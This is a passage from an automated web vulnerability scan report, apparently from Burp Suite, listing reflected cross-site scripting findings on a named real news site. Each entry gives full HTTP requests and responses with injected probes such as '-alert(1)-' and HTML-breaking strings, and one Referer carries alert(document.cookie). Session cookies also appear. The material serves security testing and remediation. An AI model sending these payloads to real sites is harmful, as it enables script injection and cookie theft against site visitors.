This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-app-store-launch-date-announced-1749/?ee6a7'-alert(1)-'5f6a6f34f2f=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63315

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
cript type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/mac-app-store-launch-date-announced-1749/?ee6a7'-alert(1)-'5f6a6f34f2f=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.115. http://www.technewsdaily.com/malware-will-change-the-face-of-warfare-1321/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /malware-will-change-the-face-of-warfare-1321/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7c60'-alert(1)-'59b579bce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /malware-will-change-the-face-of-warfare-1321f7c60'-alert(1)-'59b579bce/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40482

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
ipt type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/malware-will-change-the-face-of-warfare-1321f7c60'-alert(1)-'59b579bce/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.116. http://www.technewsdaily.com/media/system/js/caption.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /media/system/js/caption.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de0bc'-alert(1)-'6e0760504f8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /media/system/js/de0bc'-alert(1)-'6e0760504f8 HTTP/1.1
Host: www.technewsdaily.com
Proxy-Connection: keep-alive
Referer: http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:50:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:50:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40432

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/media/system/js/de0bc'-alert(1)-'6e0760504f8",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.117. http://www.technewsdaily.com/media/system/js/evalidate.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /media/system/js/evalidate.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ffe8'-alert(1)-'3bed600e059 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /media/system/js/1ffe8'-alert(1)-'3bed600e059 HTTP/1.1
Host: www.technewsdaily.com
Proxy-Connection: keep-alive
Referer: http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:50:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:50:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40432

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/media/system/js/1ffe8'-alert(1)-'3bed600e059",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.118. http://www.technewsdaily.com/media/system/js/mootools.1.2.5.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /media/system/js/mootools.1.2.5.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8047'-alert(1)-'235767e372e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /media/system/js/b8047'-alert(1)-'235767e372e HTTP/1.1
Host: www.technewsdaily.com
Proxy-Connection: keep-alive
Referer: http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:50:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:50:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40432

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/media/system/js/b8047'-alert(1)-'235767e372e",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.119. http://www.technewsdaily.com/must-follow-rules-for-safe-online-shopping-1827/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /must-follow-rules-for-safe-online-shopping-1827/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a3d1'-alert(1)-'1f5bcb4c5a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /must-follow-rules-for-safe-online-shopping-18277a3d1'-alert(1)-'1f5bcb4c5a1/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40492

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/must-follow-rules-for-safe-online-shopping-18277a3d1'-alert(1)-'1f5bcb4c5a1/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.120. http://www.technewsdaily.com/must-follow-rules-for-safe-online-shopping-1827/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /must-follow-rules-for-safe-online-shopping-1827/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8097"><a>2dce5072f32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /must-follow-rules-for-safe-online-shopping-1827/?b8097"><a>2dce5072f32=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:53:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:53:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/must-follow-rules-for-safe-online-shopping-1827/?b8097"><a>2dce5072f32=1/" />
...[SNIP]...

1.121. http://www.technewsdaily.com/must-follow-rules-for-safe-online-shopping-1827/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /must-follow-rules-for-safe-online-shopping-1827/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f241'-alert(1)-'e604f936331 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /must-follow-rules-for-safe-online-shopping-1827/?6f241'-alert(1)-'e604f936331=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64278

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
ype="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/must-follow-rules-for-safe-online-shopping-1827/?6f241'-alert(1)-'e604f936331=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.122. http://www.technewsdaily.com/neuron-like-computer-hardware-finally-gets-software-1746/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /neuron-like-computer-hardware-finally-gets-software-1746/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54536'-alert(1)-'4bc56577a9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /neuron-like-computer-hardware-finally-gets-software-174654536'-alert(1)-'4bc56577a9e/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40510

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
xt/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/neuron-like-computer-hardware-finally-gets-software-174654536'-alert(1)-'4bc56577a9e/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.123. http://www.technewsdaily.com/neuron-like-computer-hardware-finally-gets-software-1746/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /neuron-like-computer-hardware-finally-gets-software-1746/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7abfc'-alert(1)-'56ad7ec5a69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /neuron-like-computer-hardware-finally-gets-software-1746/?7abfc'-alert(1)-'56ad7ec5a69=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63392

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/neuron-like-computer-hardware-finally-gets-software-1746/?7abfc'-alert(1)-'56ad7ec5a69=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.124. http://www.technewsdaily.com/neuron-like-computer-hardware-finally-gets-software-1746/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /neuron-like-computer-hardware-finally-gets-software-1746/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41e97"><a>e63c5a1a0e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /neuron-like-computer-hardware-finally-gets-software-1746/?41e97"><a>e63c5a1a0e1=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63754

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/neuron-like-computer-hardware-finally-gets-software-1746/?41e97"><a>e63c5a1a0e1=1/" />
...[SNIP]...

1.125. http://www.technewsdaily.com/new-cell-network-doesnt-depend-on-towers--0882/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /new-cell-network-doesnt-depend-on-towers--0882/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db497'-alert(1)-'7f3300b2a24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /new-cell-network-doesnt-depend-on-towers--0882db497'-alert(1)-'7f3300b2a24/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 01:21:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=doa41jcrmvnrm1ov06t4apnvc5; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 01:21:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40490

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
t type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/new-cell-network-doesnt-depend-on-towers--0882db497'-alert(1)-'7f3300b2a24/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.126. http://www.technewsdaily.com/new-cell-network-doesnt-depend-on-towers--0882/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /new-cell-network-doesnt-depend-on-towers--0882/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7de0'-alert(1)-'484fbe1e4c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /new-cell-network-doesnt-depend-on-towers--0882/?f7de0'-alert(1)-'484fbe1e4c0=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 01:21:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
